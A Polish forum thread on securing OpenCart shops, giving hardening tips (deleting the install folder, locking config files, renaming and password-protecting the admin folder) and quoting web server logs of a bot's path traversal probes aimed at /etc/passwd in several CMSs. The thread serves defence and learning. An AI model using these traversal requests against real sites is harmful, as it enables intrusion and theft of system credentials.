ZABEZPIECZ SW?J OPENCART [ZBIORCZY]

Miejsce na wszelkie dyskusje odnośnie problemów technicznych i ewentualnych pytań z rozbudowaniem systemu w plikach i skryptach Opencart, a które nie dotyczą instalacji.

ZABEZPIECZ SWÓJ OPENCART [ZBIORCZY]

Postprzez staniapl » 28 gru 2013, o 17:44

Temat dla wszystkich, proszę o poważne wypowiedzi wnoszące coś do tematu.
ABSOLUTNIE PODSTAWOWE

1. Usuń folder install z głównego katalogu OpenCart
- absolutnie podstawowa rzecz atakujący, który natrafi na ten folder może nadpisać Twoją bazę MYSQL.
2. Chroń pliki /config.php oraz admin/config.php
- Nadaj tym plikom uprawnienia (CHMOD) 444 !
3. Zmień standardowy login i hasło na trudniejsze do odgadnięcia
- Jak wiadomo częstymi atakami są ataki metodą brute force (tj. słownikową) jeśli logujemy się do Panelu Admina za pomocą loginu 'admin' atakujący ma ułatwione zadanie. Jak pamiętamy włamanie na strony kancelarii premiera (log: admin, hasło admin123).
4. Usuń ze stopki "Powered OpenCart"
- Wiele ataków następuje poprzez wyszukanie witryn zawierających taki wpis, następnie podejmowane są próby ataku znanymi lukami w zabezpieczeniach. (Reanimowałem w ten sposób kilkanaście witryn na Wordpress) - lepiej niech na pierwszy rzut oka nie widać z jakiego systemu korzystamy.
5. Zablokujmy możliwość uploadu plików przez klienta
- (mogę się mylić ale w wer. 1.5.3.1 - istniał exploit, który pozwalał na uzyskanie dostępu do bazy danych)

CO MOŻEMY ZROBIĆ DODATKOWO
6. Zmień folder 'admin' na dowolny inny
- Jak wiadomo powszechnie znane systemy mają standardową ścieżkę do PA (OpenCart - domena/admin, Wordpress domena/wp-admin). Nie ułatwiajmy pracy atakującym i zmieńmy to na dowolną inną ścieżkę np. domena/ocart

Jak to zrobić ?

edytujemy pliki config oraz admin/config i zmieniamy wszędzie słowo admin na inne dowolne

Kod: Zaznacz cały
<?php
// HTTP
define('HTTP_SERVER', 'http://domain.com/ocart/');
define('HTTP_IMAGE', 'http://domain.com/ocart/image/');
define('HTTP_ADMIN', 'http://domain.com/ocart/RJKJKSU/');

// HTTPS
define('HTTPS_SERVER', 'http://domain.com/ocart/');
define('HTTPS_IMAGE', 'http://domain.com/ocart/image/');

// DIR
define('DIR_APPLICATION', 'domain.com/httpdocs/ocart/catalog/');
define('DIR_SYSTEM', 'domain.com/httpdocs/ocart/system/');
define('DIR_DATABASE', 'domain.com/httpdocs/ocart/system/database/');
define('DIR_LANGUAGE', 'domain.com/httpdocs/ocart/catalog/language/');
define('DIR_TEMPLATE', 'domain.com/httpdocs/ocart/catalog/view/theme/');
define('DIR_CONFIG', 'domain.com/httpdocs/ocart/system/config/');
define('DIR_IMAGE', 'domain.com/httpdocs/ocart/image/');
define('DIR_CACHE', 'domain.com/httpdocs/ocart/system/cache/');
define('DIR_DOWNLOAD', 'domain.com/httpdocs/ocart/download/');
define('DIR_LOGS', 'domain.com/httpdocs/ocart/system/logs/');

// DB
define('DB_DRIVER', 'mysql');
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'USERNAME');
define('DB_PASSWORD', 'PASSWORD');
define('DB_DATABASE', 'DATABASE');
define('DB_PREFIX', 'pre_');
?>

7. Wyłącz wyświetlanie błędów
- Panel Admina > Ustawienia > Serwer
Wyświetlaj błędy - NIE

Porady pochodzą z angielskich literatur -> ciekawy artykuł. http://cartadvisor.com/blog/2012/09/28/increasing-your-opencart-store-security/
Avatar użytkownika
staniapl
 
Posty: 631
Dołączył(a): 13 lut 2012, o 19:47
Lokalizacja: Zambr?w, Nowe Piekuty

Re: ZABEZPIECZ SWÓJ OPENCART [ZBIORCZY]

Postprzez pozpoz » 6 sty 2014, o 23:42

Fajny artykuł.

Należy jednak pamiętać, że po zmianie katalogu admina mogą wystąpić problemy z vqmodami i będzie trzeba je też edytować.


-edit -- staniapl

Zgadza się po zmianie folderu admin, przed instalacją dodatków Vqmod musimy wyedytować plik XML i zmienić ścieżki z 'admin' na nasze .
pozpoz
 
Posty: 76
Dołączył(a): 25 paź 2010, o 20:16

Re: ZABEZPIECZ SWÓJ OPENCART [ZBIORCZY]

Postprzez staniapl » 14 sty 2014, o 19:10

Dziś przeglądając logi pewnego sklepu natknąłem się na bardzo ciekawe wpisy:
(oto kilka losowo wybranych z pośród tysięcy z tego IP)

Kod: Zaznacz cały
5.2.82.59 - - [14-sty-2014:09:54:00 +0100] "GET /pandora_help.php?id=/../../../../../../../etc/passwd%00 HTTP/1.0" 200 549
5.2.82.59 - - [14-sty-2014:09:54:00 +0100] "GET /cms/website.php?template=../../../../../../../../etc/passwd%00 HTTP/1.0" 200 549
5.2.82.59 - - [14-sty-2014:09:54:01 +0100] "GET /website.php?template=../../../../../../../../etc/passwd%00 HTTP/1.0" 200 549
5.2.82.59 - - [14-sty-2014:09:54:01 +0100] "GET /admin/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 549
5.2.82.59 - - [14-sty-2014:09:54:02 +0100] "GET /index.php?option=com_dcnews&view=dcnews&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 549
5.2.82.59 - - [14-sty-2014:09:54:02 +0100] "GET index.php?option=com_cbe&task=userProfile&user=23&ajaxdirekt=true&tabname=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 400 388
5.2.82.59 - - [14-sty-2014:09:54:02 +0100] "GET /component/music/album.html?cid=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 549
5.2.82.59 - - [14-sty-2014:09:54:03 +0100] "GET /index.php?option=com_sef&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 549
5.2.82.59 - - [14-sty-2014:09:54:03 +0100] "GET /search_results/?action=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 549
5.2.82.59 - - [14-sty-2014:09:54:04 +0100] "GET /iphone/showphoto.php?pid=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 549
5.2.82.59 - - [14-sty-2014:09:54:10 +0100] "GET /showinphoto.php?pid=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 549
5.2.82.59 - - [14-sty-2014:09:54:10 +0100] "GET /propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 549


Specjalistą w dziedzinie bezpieczeństwa to nie jestem ale widać, że jakiś bot przez kilka godzin przeprowadzał sobie atak http.

Czy udało się atakującemu ? Raczej nie - choć pewności nie mam (niech wypowie się tu ktoś z szerszą wiedzą)

jakie kroki podjąłem ?

jak zauważyłem bardzo dużo logów odnosiło się do /admin ..... , więc aby chronić ten obszar zastosowałem dodatkowe hasło do katalogu Admin za pośrednictwem .Htpasswd

Jak to zrobić ? --> polecam art -- >http://www.rabinek.pl/katalog-z-haslem/ a tutaj generator plików .htpasswd -- >http://www.htaccesstools.com/htpasswd-generator/



Dzięki temu zabiegowi po wejściu w adres.pl/admin jesteśmy proszeni o hasło, jeśli wpiszemy hasło dopiero wyświetla się nam strona do logowania do PAnelu Admina.

Pozdrawiam
Avatar użytkownika
staniapl
 
Posty: 631
Dołączył(a): 13 lut 2012, o 19:47
Lokalizacja: Zambr?w, Nowe Piekuty

Re: ZABEZPIECZ SWÓJ OPENCART [ZBIORCZY]

Postprzez adikon.oc » 15 sty 2014, o 16:13

nie udało się, to był atak typowo na joomle a nie OC więc bot musiał źle rozpoznać skrypt
pod OC da się przeglądnąć pliki przez filemanager.php, to ma słaby punkt ale znowu trzeba przechwycić token co laik nie zrobi

pozdrawiam
Adrian
adikon.oc
 
Posty: 603
Dołączył(a): 28 gru 2010, o 22:56

Re: ZABEZPIECZ SWÓJ OPENCART [ZBIORCZY]

Postprzez staniapl » 17 sty 2014, o 13:47

adikon.oc napisał(a):nie udało się, to był atak typowo na joomle a nie OC więc bot musiał źle rozpoznać skrypt

Dzięki za info, bot był dość inteligentny bo sprawdzał nie tylko Joomle ale i kilka innych dość popularnych cms-ów

Kod: Zaznacz cały
GET /GetSimple_2.01/admin/download.php?file=../../../../../etc/passwd%00 HTTP/1.0  - tu np GetSimple

GET /wp-content/plugins/old-post-spinner/logview.php?ops_file=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0"  - tu np Wordpress

Jak poinformował mnie usługodawca hostingu były to ataki typu directory/path reversal - mające na celu kradzież haseł do konta hostingowego z pliku etc password. Atak nie powiódł się.
pod OC da się przeglądnąć pliki przez filemanager.php, to ma słaby punkt ale znowu trzeba przechwycić token co laik nie zrobi


Aby temu zapobiec, zmieniajmy w panel > system> ustawienia > serwer - klucz zabezpieczeń (ze standardowego 12345 na własny) i pod żadnym pozorem gdy jesteśmy zalogowani do panelu admina nie otwierajmy linków od nieznajomych !!
Avatar użytkownika
staniapl
 
Posty: 631
Dołączył(a): 13 lut 2012, o 19:47
Lokalizacja: Zambr?w, Nowe Piekuty


Powrót do Pomoc techniczna przy Opencart

Kto przegląda forum

Użytkownicy przeglądający ten dział: Brak zidentyfikowanych użytkowników i 1 gość

cron